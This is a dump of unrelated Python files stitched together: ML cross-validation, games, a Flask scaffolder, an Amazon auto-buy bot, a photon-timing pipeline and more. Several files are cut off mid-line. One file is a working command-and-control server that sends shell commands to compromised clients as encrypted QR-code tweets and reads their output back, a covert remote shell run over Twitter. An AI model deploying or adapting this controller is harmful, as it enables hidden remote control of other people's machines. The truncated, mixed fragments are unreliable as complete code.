    Imgslices = [images[j::5] for j in xrange(5)] #slices both our X and Y into n parts
    Labelslices = [labels[l::5] for l in xrange(5)]
    Error = np.zeros(5) #array of errors to collect after each fold
    for i in xrange(0, 5):
        Imgtraining = np.array(Imgslices[:i] + Imgslices[(i+1):]) #get the training sets by exluding one of the slices
        Labeltraining = np.array(Labelslices[:i] + Labelslices[(i+1):])
        Imgtraining.flatten() #formatting
        Labeltraining.flatten()
        print "fold: " + str(i)
        print "training classifier"
        # Merge the four held-in slices; slice i is the validation fold.
        ConcatenatedImages = np.concatenate((Imgtraining[0], Imgtraining[1], Imgtraining[2], Imgtraining[3]))
        ConcatenatedLabels = np.concatenate((Labeltraining[0], Labeltraining[1], Labeltraining[2], Labeltraining[3]))
        classifier = custom_build_classifier(ConcatenatedImages, ConcatenatedLabels, C, degree, poly)
        predicted = classify(Imgslices[i], classifier)
        error = error_measure(predicted, Labelslices[i])
        print "Error at fold " + str(i) + " : " + str(error)
        Error[i] = error
    return np.average(Error)
def TrainingSizeFold(images, labels):
    """Sweep training-set sizes, 5-fold CV each, and save the average
    errors to SizeAnalysisSVM.txt.  Python 2 code."""
    TrainingSizes = [1000, 2000, 4000, 10000]
    SizeE = np.zeros(len(TrainingSizes))
    for i in xrange(0, len(TrainingSizes)):
        print "Training on: " + str(TrainingSizes[i])
        # Balanced subsample of the requested size (test split disabled).
        newimages, newlabels, temp, temp2 = fairtraintest(images, labels, TrainingSizes[i], 0)
        #print len(newimages)
        #print len(newlabels)
        SizeE[i] = fivefoldsize(newimages, newlabels, 1.0, 3, -1)
        print "Avg Error at training size: " + str(SizeE[i])
        print SizeE[i]
    np.savetxt('SizeAnalysisSVM.txt', SizeE, delimiter=',')
def TrainingCFold(images, labels):
TrainingCvalues = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1, 1.25, 1.5, 1.75, 2, 3, 4, 5, 6, 7, 8, 9, 10]
SizeE = np.zeros(len(TrainingCvalues))
for i in xrange(0, len(TrainingCvalues)):
print "Training on: c = " + str(TrainingCvalues[i])
SizeE[i] = fivefoldsize(SelectedImages, SelectedLabels, TrainingCvalues[i], 3.0, -1)
print "Avg Error at training size: " + str(SizeE[i])
print SizeE[i]
np.savetxt('CAnalysisSVM.txt', SizeE, delimiter=',')
def TrainingPolyFold(images, labels):
TrainingPolyvalues = [0,1,2,3]
SizeE = np.zeros(len(TrainingPolyvalues))
for i in xrange(0, len(TrainingPolyvalues)):
print "Training on: degree = " + str(i)
SizeE[i] = fivefoldsize(SelectedImages, SelectedLabels, 50, i, 1)
print "Avg Error at training size: " + str(SizeE[i])
print SizeE[i]
np.savetxt('PolyAnalysisSVM.txt', SizeE, delimiter=',')
def buildConfusionMatrix(predicted, actual):
    """Build a 10x10 confusion matrix: rows = actual digit, cols = predicted.

    Fixes: iterates with zip (works on both Python 2 and 3, unlike the
    original xrange) and coerces labels to int before indexing — the
    callers store labels in float arrays (np.zeros), and float indexing
    fails on modern NumPy.
    """
    matrix = np.zeros((10, 10))
    for p, a in zip(predicted, actual):
        matrix[int(a)][int(p)] += 1
    return matrix
def fivefoldconfusion(images, labels, C, degree, poly):
    """5-fold CV that also builds a confusion matrix per fold and displays
    every misclassified image with matplotlib.  Python 2 code; returns
    nothing (results are printed/plotted only)."""
    Imgslices = [images[j::5] for j in xrange(5)] #slices both our X and Y into n parts
    Labelslices = [labels[l::5] for l in xrange(5)]
    Error = np.zeros(5) #array of errors to collect after each fold
    myConfusionMatrixes = np.zeros((5,10,10))
    for i in xrange(0, 5):
        Imgtraining = np.array(Imgslices[:i] + Imgslices[(i+1):]) #get the training sets by exluding one of the slices
        Labeltraining = np.array(Labelslices[:i] + Labelslices[(i+1):])
        Imgtraining.flatten() #formatting
        Labeltraining.flatten()
        print "fold: " + str(i)
        print "training classifier"
        # Merge the four held-in slices; slice i is the validation fold.
        ConcatenatedImages = np.concatenate((Imgtraining[0], Imgtraining[1], Imgtraining[2], Imgtraining[3]))
        ConcatenatedLabels = np.concatenate((Labeltraining[0], Labeltraining[1], Labeltraining[2], Labeltraining[3]))
        classifier = custom_build_classifier(ConcatenatedImages, ConcatenatedLabels, C, degree, poly)
        predicted = classify(Imgslices[i], classifier)
        error = error_measure(predicted, Labelslices[i])
        print "Error at fold " + str(i) + " : " + str(error)
        myConfusionMatrixes[i] = buildConfusionMatrix(predicted, Labelslices[i])
        #print myConfusionMatrixes[i]
        # Show each misclassified 28x28 image (blocks until closed).
        for k in xrange(0, len(predicted)):
            if(predicted[k] != Labelslices[i][k]):
                print "predicted: " + str(predicted[k])
                print "actual: " + str(Labelslices[i][k])
                plt.imshow(np.reshape(Imgslices[i][k], (28, 28)), cmap = 'binary', interpolation='nearest')
                plt.show()
if __name__ == "__main__":
    # Load MNIST, train the tuned SVC on a balanced 8000-image subsample,
    # persist it, reload it, and report the test-set error.  The commented
    # blocks are the one-off analysis runs used to pick the hyperparameters.
    images, labels = load_mnist(digits=range(0,10), path = '.')
    #preprocessing
    #No preprocessing as SVM performs better with scaled weights
    images = preprocess(images)
    #Training on different Sizes - ANALYSIS:
    #TrainingSizeFold(images, labels)
    #picking training and testing set for optimizing SVM
    SelectedImages, SelectedLabels, TestingSet, TestingLabels = fairtraintest(images, labels, 8000, 2000)
    #import pickle
    #pickle.dump(SelectedImages, open('training_set_1.p', 'w'))
    #pickle.dump(SelectedLabels, open('training_labels_1.p', 'w'))
    #SelectedImages = pickle.load(open('training_set_1.p'))
    #SelectedLabels = pickle.load(open('training_labels_1.p'))
    #Training on C coefficient
    #TrainingCFold(SelectedImages, SelectedLabels)
    #Training on Poly Coefs
    #TrainingPolyFold(SelectedImages, SelectedLabels)
    #optimized classifier (from what we learnt in 5-fold):
    #fivefoldconfusion(SelectedImages, SelectedLabels, 50, 2, 1)
    #Error = fivefoldsize(SelectedImages, SelectedLabels, , 3)
    #classifier = custom_build_classifier(SelectedImages, SelectedLabels, 50, 2, 1)
    #save_classifier(classifier, images, labels)
    classifier = build_classifier(SelectedImages, SelectedLabels)
    save_classifier(classifier, SelectedImages, SelectedLabels)
    # Round-trip through the pickle file to verify persistence works.
    classifier = pickle.load(open('classifier_1.p'))
    predicted = classify(TestingSet, classifier)
    print error_measure(predicted, TestingLabels)
|
import subprocess
# Tasklist command
cmd_tasklist = ["tasklist"]
process = subprocess.Popen(cmd_tasklist, stdout=subprocess.PIPE)
pid_col = 1
name_col = 0
name_list = {}
# Invoking tasklist command
print "=> invoking tasklist command"
for line in process.stdout.readlines():
list = line.split(" ")
filtered = filter(None,list)
if len(filtered) > 2:
name_list[filtered[pid_col]] = filtered[name_col]
# Invoking Netstat command
print "==> invoking netstat command"
cmd_netstat = ["netstat", "-ano"]
process = subprocess.Popen(cmd_netstat, stdout=subprocess.PIPE)
network_list = []
netstat_loc_addr_col = 1
netstat_for_addr_col = 2
netstat_state_col = 3
netstat_pid_col = 4
output_file_name = "netstat_output.txt"
# merging Image Name for PID and Netstat output
print "===> processing output"
start_recording = False
for line in process.stdout.readlines():
list = line.split(" ")
filtered = filter(None,list)
# if start_recording:
# network_list.append(filtered)
if "TCP" in filtered[0]:
# start_recording = True
network_list.append(filtered)
print "====> printing output to file named ==> " + output_file_name
output_f = open(output_file_name, "w")
output_f.write("Proto \"Local Address\" \" Foreign Address\" \" PID\" \"Image Name\" \n" +
"==============================================================================\n")
for line in network_list:
if "TCP" in line[0]:
pid = line[netstat_pid_col]
pid_cleansed = pid.replace("\r\n","")
line[netstat_pid_col] = pid_cleansed
try:
name = name_list[pid_cleansed]
line.append(name)
except:
line.append("unknown")
as_string = " ".join(line)
output_f.write(as_string)
output_f.write("\n")
print "======> finished! <====="
|
import turtle
# Draw two circles (radius 100 then 50) with a fast-moving turtle.
pen = turtle.Turtle()
pen.speed(10)
for radius in (100, 50):
    pen.circle(radius)
|
#!/usr/bin/env python
# coding: utf-8
# run testModel1 from CosmoTransitions
from test import testModel1

# Instantiate the example model and trace all of its phase transitions.
model = testModel1.model1()
model.findAllTransitions()
|
#!/usr/bin/env python
# encoding: utf-8
import os
import sys
import re
class Models() :
    """Value object: the directory containing models.py plus the model class names found in it."""
    def __init__(self,path,models) :
        # path: directory holding models.py; models: list of class-name strings.
        self.path = path
        self.models = models
class Api() :
    """Scaffolds Flask API modules: for a blueprint package at ``root``,
    generates one stub .py file per endpoint name in ``api``."""
    def __init__(self,root,api) :
        # root: path of the blueprint package; api: list of endpoint module names.
        self.root = root
        self.api = api
    def static_content(self,fapi,api) :
        """Write the banner comment and the common import block into ``fapi``."""
        api = api+'.py'
        OutputList = \
        ['#coding:utf-8\n\n\n',
        ' \'\'\' ' ,
        ' ********************************** \n\n ' ,
        ' ' ,
        api ,
        '\n\n',
        ' ********************************** ' ,
        '\'\'\' ' ,
        '\n\n\n' ,
        'from flask import jsonify , g , request , current_app \n',
        'from flask_login import current_user\n' ,
        'from ..models import db \n' ,
        'import json\n' ,
        'import request\n'  # NOTE(review): generated line is likely meant to be 'import requests' — confirm
        ]
        fapi.writelines(OutputList)
    def get_blueprint(self) :
        """Parse the package __init__.py and store the Blueprint variable name
        (the first single-quoted string on the line after the one containing
        'Blueprint') in ``self.blue``."""
        root = self.root
        api = self.api
        # NOTE(review): iterating over ``root`` (a string) re-runs the body once
        # per character; the work is idempotent but was probably meant to run once.
        for each in root :
            os.chdir(root)
            init = open("__init__.py","r")
            lines = init.readlines()
            for index , line in enumerate(lines) :
                if "Blueprint" in line :
                    temp = lines[index+1]
                    blue = ''
                    flag = 0
                    # Collect the characters between the first pair of single quotes.
                    for j , i in enumerate(temp) :
                        if temp[j] == '\'' and flag != 0 :
                            break
                        if flag == 1 :
                            blue += i
                        if i == '\'' :
                            flag += 1
                    self.blue = blue
    def import_models(self,models,fapi) :
        """Write one import line pulling every discovered model class."""
        model = (' , ').join(models.models)
        Output = ["from ..models import " + model+"\n" ]
        fapi.writelines(Output)
    def import_blueprint(self,fapi) :
        """Write the blueprint import for the generated module."""
        Output = ["from . import " + self.blue +"\n\n\n\n\n\n"]
        fapi.writelines(Output)
    def to_get(self,fapi) :
        """Append a GET route stub to the generated module."""
        Output = ['@'+self.blue+'.route(\' \', methods=[\'GET\']) \n' ,
        'def \n ' ,
        ' \'\'\'\n description of function\n \'\'\'\n ' ,
        '\n\n' ,
        ' return jsonify ({ \n\n }) ' ,
        ', \n\n\n\n' ,
        ]
        fapi.writelines(Output)
    def to_post(self,fapi) :
        """Append a POST route stub (with db add/commit boilerplate)."""
        Output = ['@'+self.blue+'.route(\' \', methods=[\'POST\']) \n' ,
        'def \n ' ,
        ' \'\'\'\n description of function\n \'\'\'\n ' ,
        '\n\n' ,
        ' db.session.add() \n' ,
        ' db.session.commit() \n',
        ' return jsonify ({ \n\n }) ' ,
        ', \n\n\n\n' ,
        ]
        fapi.writelines(Output)
    def to_put(self,fapi) :
        """Append a PUT route stub (with db add/commit boilerplate)."""
        Output = ['@'+self.blue+'.route(\' \', methods=[\'PUT\']) \n' ,
        'def \n ' ,
        ' \'\'\'\n description of function\n \'\'\'\n ' ,
        '\n\n' ,
        ' db.session.add() \n' ,
        ' db.session.commit() \n',
        ' return jsonify ({ \n\n }) ' ,
        ', \n\n\n\n' ,
        ]
        fapi.writelines(Output)
    def to_delete(self,fapi) :
        """Append a DELETE route stub (with db delete/commit boilerplate)."""
        Output = ['@'+self.blue+'.route(\' \', methods=[\'DELETE\']) \n' ,
        'def \n ' ,
        ' \'\'\'\n description of function\n \'\'\'\n ' ,
        '\n\n' ,
        ' db.session.delete() \n' ,
        ' db.session.commit() \n',
        ' return jsonify ({ \n\n }) ' ,
        ', \n\n\n\n' ,
        ]
        fapi.writelines(Output)
    def generate_api(self,models) :
        """Create a stub module for every endpoint that does not exist yet."""
        root = self.root
        api = self.api
        print root
        # NOTE(review): same per-character chdir pattern as get_blueprint.
        for each in root :
            os.chdir(root)
        for item in api :
            if not os.path.isfile(item+".py") :
                fapi = open(item+".py","w+")
                self.static_content(fapi,item)
                self.import_models(models,fapi)
                self.import_blueprint(fapi)
                # NOTE(review): to_get and to_post are each emitted twice —
                # confirm whether duplicate stubs are intentional.
                self.to_get(fapi)
                self.to_get(fapi)
                self.to_post(fapi)
                self.to_post(fapi)
                self.to_put(fapi)
                self.to_delete(fapi)
                fapi.close()
def find_init() :
API = []
for root , dirs , files in os.walk(".") :
for each in files :
if each == '__init__.py' :
init = open(root+"/"+each,'r')
lines = init.readlines()
for index , line in enumerate(lines) :
if "from" in line and "." in line and "import" in line :
if '\\' in line :
flag = 1
_api = re.split(",",line)
first = _api[0].split()[-1]
api_ = _api[1:]
api_ = api_[:-1]
api_.append(first)
if flag == 1 :
next_ = lines[index+1][:-1]
more = re.split(",",next_)
api_.extend(more)
flag = 0
api = []
for a in api_ :
a = a.replace(' ','')
api.append(a)
api = list(set(api))
path = os.getcwd() + root[1:]
item = Api(path,api)
API.append(item)
init.close()
if len(API) == 0 :
print "Can not find __int__.py"
sys.exit(0)
return API
def find_models() :
    """Walk the current directory for a models.py and collect every class name
    declared in it. Returns a Models(path, names) object."""
    models = []
    path = '1'
    for root , dirs , files in os.walk(".") :
        for filename in files :
            if filename != 'models.py' :
                continue
            path = root
            source = open(root + "/" + filename, 'r')
            for line in source.readlines() :
                if line[:5] != 'class' :
                    continue
                # Pull the class name: skip spaces, stop at '(' or ':'.
                name = ''
                for ch in line[6:] :
                    if ch == "(" or ch == ':' :
                        break
                    if ch != ' ' :
                        name += ch
                models.append(name)
    return Models(path, models)
if __name__ == '__main__' :
    # Discover API packages and model classes, then scaffold any missing files.
    api = find_init()
    model = find_models()
    for each in api :
        each.get_blueprint()
        each.generate_api(model)
|
#!/usr/bin/env python
# encoding: utf-8
import os
from flask import Flask , request , url_for , send_from_directory
from werkzeug import secure
|
import random
# Game configuration: 9 lives, a pool of five-letter words.
lives = 9
words = ['shirt', 'human', 'fairy', 'teeth', 'otter', 'plane', 'eight', 'pizza', 'lives']
secret_word = random.choice(words)
# The clue starts fully hidden; every word in the pool is 5 letters long.
clue = list('?????')
heart_symbol = u'\u2764'  # heavy black heart, used to render remaining lives
guessed_word_correctly = False
def update_clue(guessed_letter, secret_word, clue):
    """Reveal every position of *guessed_letter* in *clue* (mutated in place)."""
    for position, letter in enumerate(secret_word):
        if letter == guessed_letter:
            clue[position] = letter
while lives > 0:
    # Show progress and remaining lives.
    print(clue)  # NOTE(review): prints the list repr, e.g. ['?', 'a', ...] — cosmetic
    print('Lives left: ' + heart_symbol * lives)
    guess = input('Guess a letter or the whole word: ')
    # A correct whole-word guess ends the game immediately.
    if guess == secret_word:
        guessed_word_correctly = True
        break
    # Letter guess: reveal matches, otherwise lose a life.
    if guess in secret_word:
        update_clue(guess, secret_word, clue)
    else:
        print('Incorrect. You lost a life.')
        lives -= 1
# Loop exits either by a win (break) or by running out of lives.
if guessed_word_correctly:
    print('You won! The secret word was ' + secret_word)
else:
    print('You lost! The secret word was ' + secret_word)
|
import pygame
from pygame.sprite import Sprite
class Mine(Sprite):
    """A mine sprite spawned at the ship's current position."""
    def __init__(self, ai_settings, screen, ship):
        super().__init__()
        self.screen = screen
        # Load the artwork and centre its rect on the ship.
        self.image = pygame.image.load('images/mine.png')
        self.rect = self.image.get_rect()
        self.rect.center = ship.rect.center
    def blitme(self):
        """Draw the mine at its current rect position."""
        self.screen.blit(self.image, self.rect)
|
from mongoengine import *
from datetime import datetime
from db import config
# Open the MongoDB connection using the settings from db.config.
connect(config._MongoengineConnect)
class Item(EmbeddedDocument):
    '''
    Stream item: one sentence belonging to a stream (e.g. a video stream or
    music stream — a stream is a collection of sentences).
    '''
    # belongsto_user = ReferenceField((Users), required=True,dbref=True)#,dbref=True
    meta = {'allow_inheritance': True}
    # The Japanese source sentence (required).
    sentence_jp = StringField(required=True)
    # NOTE(review): purpose of Nx is not evident from this file — confirm.
    Nx = StringField()
    tags = ListField(StringField(max_length=20))
    def __str__(self):
        return self.sentence_jp
class SubFlow(Document):
    """A named stream: a list of embedded Item sentences plus a creation date."""
    meta = {'allow_inheritance': True}
    name = StringField()
    items = EmbeddedDocumentListField(Item)
    # Creation time; datetime.now is naive local time (alternatives noted below).
    date = DateTimeField(default=datetime.now, required=True) #datetime.utcnow datetime.now()
# s = Sentences(sentence_jp = 'dsads')
# s.save()
# print(s)
###############################################################################
# solve func
class Solve():
    """Operations on a single sentence document."""
    def __init__(self,sentence):
        self.sentence = sentence
    def delete(self):
        """Remove the sentence document from its collection."""
        self.sentence.delete()
    def update(self,db_word):
        """Attach a word record (DB reference plus its MeCab analysis) and persist."""
        entry = {
            'word_db': db_word,
            'word_mecab': db_word.mecab,
        }
        self.sentence.words_list.append(entry)
        self.sentence.save()
|
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Amazon :
    """Automates logging in and buying a product on Amazon via Selenium."""
    def __init__(self):
        webOptions = webdriver.ChromeOptions()
        webOptions.add_argument("start-maximized")
        webOptions.add_argument("disable-infobars")
        # FIX: was `options=options` (NameError) — the locally built object is webOptions.
        self.driver = webdriver.Chrome(executable_path=r"/pathtothechromedriver",options=webOptions)
    def login(self,url,email,password):
        """Log in through the given sign-in URL with the supplied credentials."""
        self.driver.get(url)
        login_email = self.driver.find_element_by_xpath("//input[@id='ap_email']")
        login_email.send_keys(email)
        cont = self.driver.find_element_by_xpath("//input[@id='continue']")
        cont.click()
        login_password = self.driver.find_element_by_xpath("//input[@id='ap_password']")
        login_password.send_keys(password)
        signin = self.driver.find_element_by_xpath("//input[@id='signInSubmit']")
        signin.click()
    def buy_now(self,url):
        """Keep refreshing the product page until the Buy Now button exists, then click it."""
        time.sleep(1)
        self.driver.get(url)
        # FIX: was `false` (NameError) — Python's boolean literal is False.
        bought = False
        while not bought:
            try:
                buyNowButton = self.driver.find_element_by_xpath("//input[@id='buy-now-button']")
                buyNowButton.click()
                bought = True
            except Exception:  # FIX: narrowed from bare except; button not present yet
                self.driver.refresh()
                time.sleep(1)
    def completePayment(self,cvv):
        """Select the stored card, enter the CVV and place the order."""
        paymentMode = self.driver.find_element_by_xpath("//input[@type='radio']/../../../../following-sibling::div//span[(.)='ending in 2444']")
        paymentMode.click()
        # FIX: was `self.driver,find_element_by_xpath(...)` — comma typo made a tuple
        # instead of calling the method; attribute access needs a dot.
        cvvEntry = self.driver.find_element_by_xpath("//input[@type='radio']/../../../../following-sibling::div//span[(.)='ending in 2444']/../../../../../../../following-sibling::div//input[@type='password']")
        cvvEntry.send_keys(cvv)
        continueButton = self.driver.find_element_by_xpath("(//div/span/span/input[@type='submit'])[2]")
        continueButton.click()
        time.sleep(3)
        placeOrder = self.driver.find_element_by_xpath("//span[@id='placeYourOrder']/span/input[@title='Place Your Order and Pay' and @type='submit']")
        placeOrder.click()
        #need to add notifications to the user somehow
#need to add notifications to the user somehow
if __name__=="__main__":
    # Credentials and card CVV are intentionally blank — fill in before running.
    autoBuyBot = Amazon()
    email = ""
    password = ""
    cvv = ""
    autoBuyBot.login("https://www.amazon.in/gp/sign-in.html",email,password)
    autoBuyBot.buy_now("https://www.amazon.in/Sony-CFI-1008B01R-PlayStation-Digital-Edition/dp/B08FVRQ7BZ")
    #use this for disc edition : https://www.amazon.in/Sony-CFI-1008A01R-PlayStation-5-console/dp/B08FV5GC28
    #use this for bundle1 : https://www.amazon.in/PS5TM-Digital-DualSenseTM-charging-station/dp/B08NTVHTPT
    autoBuyBot.completePayment(cvv)
|
import time
import tweepy
import os
import zlib
import qrcode
from pyzbar.pyzbar import decode
from PIL import Image
import base64
from encryption import AESCipher, load_keys
import pickle
import json
import subprocess
import requests
from io import BytesIO
from api_keys import api_keys
import sys
from sqlalchemy import orm
from sqlalchemy.ext.declarative import declarative_base
import sqlalchemy as sa
import uuid
from colored import fg, attr
reset = attr('reset')  # terminal colour reset sequence
base = declarative_base()
# SQLite-backed registry of known clients.
engine = sa.create_engine('sqlite:///clients.db')
base.metadata.bind = engine
session = orm.scoped_session(orm.sessionmaker())(bind=engine)
# we using QRs cause twitter character limit banter
# models for clients
class Client(base):
    """ORM row: one connected client and the working directory it reported."""
    __tablename__ = 'clients' #<- must declare name for db table
    idx = sa.Column(sa.Integer,primary_key=True)  # surrogate key
    client_id = sa.Column(sa.String(255),nullable=False)  # unique client identifier
    init_wrkdir = sa.Column(sa.String(512),nullable=False)  # prompt shown when connecting
    def __repr__(self):
        return f"{self.client_id}"
# create listener
class ServerListener(tweepy.StreamListener):
    """Tweepy stream listener acting as the server side of the C2 channel.

    Messages are AES-encrypted, base64-encoded, rendered as QR-code images and
    exchanged as tweets; the decoded text uses the framing
    ``<client_id>::::<payload>::::<type>``.
    """
    def __init__(self, api, cipher_key, session, current_client):
        self.api = api
        self.cipher = AESCipher(cipher_key)
        self.sess = session
        # IDs of every client previously registered in the local DB.
        self.client_ids = [i.client_id for i in self.sess.query(Client).all()]
        self.server_id = uuid.uuid4().hex
        self.current_client = current_client
        self.command_to_send = ''
        # The fresh server id must not collide with a known client id.
        assert self.server_id not in self.client_ids
        if not self.current_client:
            print(f"{fg('yellow')} No clients found, listening...")
        else:
            print(fg('red'))
            print(f'Successfully connected to {self.current_client}!')
            # Prompt with the client's stored working directory, queue first command.
            self.command_to_send = input(self.sess.query(Client).filter(Client.client_id == self.current_client).all()[0].init_wrkdir)
            self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
    def on_data(self, raw_data):
        """Entry point for raw stream events; ignores delete/limit notices."""
        # process raw stream data, read qr, pipe message
        if 'delete' in raw_data:
            pass
        elif 'limit' in raw_data:
            pass
        else:
            self.process_raw(raw_data)
        return True
    def process_raw(self, raw_data):
        """Decode a tweet and react: register new clients, print responses, send next command."""
        # do stuff here, raw_data is a string
        data = json.loads(raw_data)
        tweet = self.read_message(data)
        client_id = self._get_client_id(tweet)
        # is it a new connection?
        if self._tweet_type(tweet) == 'connection_confirm' and client_id not in self.client_ids and client_id!=self.server_id:
            # add new client
            self.sess.add(Client(client_id = client_id, init_wrkdir=self._get_response_message(tweet)))
            self.sess.commit()
            print(fg('green')+'New client connected!', client_id + fg('red'))
            connect_to_new = input(fg('yellow')+'Connect to new client? ' + client_id + '(Y/N)')
            if connect_to_new in ['y','Y']:
                print(fg('red'))
                self.current_client = client_id
                self.command_to_send = input(self._get_response_message(tweet))
                # send command and wait for response
                self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
        # is it a client response?
        if client_id == self.current_client and self._tweet_type(tweet) == 'command_response' and client_id!=self.server_id:
            # this is a response!
            print('this is a response!')
            response = self._get_response_message(tweet)
            print(response+ '\n')
            self.command_to_send = input(self._get_response_message(tweet))
            # send command and wait for response
            self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
    def on_error(self, status_code):
        # 420 == Twitter rate limiting; returning False disconnects the stream.
        if status_code == 420:
            return False
    #-------------------------------------------------------Private subs-------------------------------------------------------#
    def _tweet_type(self, tweet):
        """Last ::::-delimited field — the message type."""
        if tweet.split('::::'):
            return tweet.split('::::')[-1]
        return 'empty'
    def _get_client_id(self, tweet):
        """First ::::-delimited field — the sender's client id."""
        if tweet.split('::::'):
            return tweet.split('::::')[0]
        return 'empty'
    def _get_response_message(self, tweet):
        """Second ::::-delimited field — the payload."""
        if tweet.split('::::'):
            return tweet.split('::::')[1]
        return 'empty'
    def _connect_different(self):
        """Interactive prompt to switch to another registered client or exit."""
        choice = input(reset + 'Would you like to connect to someone else or quit? (connect/quit)')
        if choice in ['connect', 'c', 'con']:
            possible_clients = session.query(Client).all()
            if possible_clients:
                print('Available clients: ', fg('yellow'))
                for client in possible_clients:
                    print(client)
                wanted_client = input('Please select a client to connect to: ')
                print(f'Connecting to {wanted_client}...')
                self.current_client = wanted_client
                self.command_to_send = input(self.sess.query(Client).filter(Client.client_id == self.current_client).all()[0].init_wrkdir)
                self.post_command(f'{self.current_client}::::{self.command_to_send}::::command')
            else:
                print(f"{fg('yellow')} No clients found, listening...")
        else:
            sys.exit(reset+"Goodbye!")
    #-------------------------------------------------------Public subs-------------------------------------------------------#
    def generate_qr(self, message):
        """Encrypt, base64-encode and render ``message`` as a QR image."""
        # encode to base_64 and generate_qr
        message = self.cipher.encrypt(message)
        message = base64.b64encode(message.encode('utf-8'))
        qr = qrcode.make(message)
        return qr
    def read_qr(self, img):
        """Inverse of generate_qr: decode the QR, un-base64 and decrypt."""
        message = decode(img)[0].data.decode()
        message = base64.b64decode(message).decode('utf-8')
        return self.cipher.decrypt(message)
    def post_command(self, message):
        """Tweet ``message`` as a QR image; 'exit ShAfT' switches clients instead."""
        if self.command_to_send == 'exit ShAfT':
            self._connect_different()
        else:
            qr = self.generate_qr(message)
            qr.save('command_to_send.jpg')
            # post to twitter, then remove the temporary image
            self.api.update_with_media('command_to_send.jpg')
            os.remove('command_to_send.jpg')
        return True
    def read_message(self, tweet_data):
        """Return the decoded QR payload when the tweet has media, else its text.

        NOTE(review): media present but without 'media_url_https' falls through
        and returns None — confirm that is intended.
        """
        if 'media' in tweet_data['entities']:
            if 'media_url_https' in tweet_data['entities']['media'][0]:
                # get image
                response = requests.get(tweet_data['entities']['media'][0]['media_url_https'])
                img = Image.open(BytesIO(response.content))
                message = self.read_qr(img)
                return message
        else:
            return tweet_data['text']
# create stream
class ShellStream():
    """Thin wrapper binding a tweepy Stream to a listener."""
    def __init__(self, auth, listener):
        self.stream = tweepy.Stream(auth=auth, listener=listener)
    def start(self, user_id):
        """Block and filter the stream to tweets from ``user_id``."""
        self.stream.filter(follow = [user_id])
if __name__ == '__main__':
    # Load the AES key and make sure the clients table exists.
    _, aeskey = load_keys()
    base.metadata.create_all()
    possible_clients = session.query(Client).all()
    # Authenticate with the Twitter API.
    auth = tweepy.OAuthHandler(api_keys['consumer_key'], api_keys['consumer_secret'])
    auth.set_access_token(api_keys['access_token'], api_keys['access_token_secret'])
    api = tweepy.API(auth)
    if possible_clients:
        # Known clients exist: let the operator pick one to attach to.
        print('Available clients: ', fg('yellow'))
        for client in possible_clients:
            print(client)
        wanted_client = input('Please select a client to connect to: ')
        print(f'Connecting to {wanted_client}...')
        stream = ShellStream(auth = auth, listener=ServerListener(api, aeskey, session, wanted_client))
    else:
        # No clients yet: start listening until one announces itself.
        stream = ShellStream(auth = auth, listener=ServerListener(api, aeskey, session, None))
    stream.start(api_keys['my_user_id'])
|
import cv2
import numpy as np
# Load the ground-truth image and the sketch (placeholder paths — replace
# before running). NOTE(review): cv2.imread returns None on a bad path, which
# would make np.concatenate raise.
img1 = cv2.imread('Groundtruthhere') ##replace with Original image here
img2 = cv2.imread('Sketchlocationhere') ## replace with the sketch here
# Stitch the two images side by side (same height required) and save.
vis = np.concatenate((img1, img2), axis=1)
cv2.imwrite('out.jpg', vis) ##mention the directory where you want the concatenated image to be saved
|
#!/bin/python
import sys
n = int(raw_input().strip())
arr = map(int,raw_input().strip().split(' '))
negativeNumber = 0
positiveNumber = 0
zero = 0
for i in arr:
if i < 0:
negativeNumber+=1
elif i > 0:
positiveNumber+=1
else:
zero+=1
print format(positiveNumber/float(len(arr)),'.6f')
print format(negativeNumber/float(len(arr)),'.6f')
print format(zero/float(len(arr)),'.6f')
|
import logging
import numpy as np
import pandas as pd
import warnings
from numba import jit, uint64
from typing import Tuple, List
import attr
from attr.validators import instance_of
from itertools import chain
@attr.s
class TagPipeline:
    """
    Pipeline to interpolate TAG lens pulses
    :param pd.DataFrame photons: DataFrame of photons in experiment
    :param pd.Series tag_pulses: Series of TAG events
    :param float freq: Expected frequency of TAG sync pulses in Hz
    :param float binwidth: Multiscaler binwidth in seconds (100 ps == 100e-12)
    :param int num_of_pulses: Number of TAG pulses from the driver per period. Currently NotImplemented
    :param bool to_phase: Whether to compensate for the sinusoidal pattern of the TAG. Leave True
    :param int offset: Offset in degrees given from the TAG driver for each pulse
    """
    photons = attr.ib(validator=instance_of(pd.DataFrame))
    tag_pulses = attr.ib(validator=instance_of(pd.Series))
    freq = attr.ib(default=189e3, validator=instance_of(float))  # Hz
    binwidth = attr.ib(
        default=800e-12, validator=instance_of(float)
    )  # Multiscaler binwidth
    num_of_pulses = attr.ib(
        default=1, validator=instance_of(int)
    )  # Number of pulses per TAG period
    to_phase = attr.ib(
        default=True, validator=instance_of(bool)
    )  # compensate the sinusoidial pattern of TAG
    offset = attr.ib(
        default=0, validator=instance_of(int)
    )  # offset the TAG phase [degrees]
    finished_pipe = attr.ib(init=False)  # True when phase allocation succeeded
    @property
    def first_photon(self):
        # Arrival time of the earliest photon, in multiscaler bins (uint64).
        return self.photons.abs_time.min().astype(np.uint64)
    @property
    def last_photon(self):
        # Arrival time of the latest photon, in multiscaler bins (uint64).
        return self.photons.abs_time.max().astype(np.uint64)
    def run(self):
        """ Main pipeline: clean pulses -> verify periods -> allocate phases """
        # Keep only pulses inside the experiment's time window.
        clean_tag = self.__preserve_relevant_tag_pulses().reset_index(drop=True)
        verifier = TagPeriodVerifier(
            tag=clean_tag,
            freq=self.freq / self.num_of_pulses,
            binwidth=self.binwidth,
            first_photon=np.int64(self.first_photon),
            last_photon=self.last_photon,
        )
        verifier.verify()
        if verifier.success:
            phaser = TagPhaseAllocator(
                photons=self.photons,
                tag=verifier.tag,
                pulses_per_period=self.num_of_pulses,
                to_phase=self.to_phase,
                offset=self.offset,
            )
            phaser.allocate_phase()
            self.photons = phaser.photons
            self.finished_pipe = True
        else:
            self.finished_pipe = False
        try:  # Add the 'TAG' column to check data after pipeline finishes
            self.photons["TAG"] = np.pad(
                clean_tag,
                (self.photons.shape[0] - len(self.tag_pulses), 0),
                "constant",
            )
        except ValueError:  # more TAG pulses than events
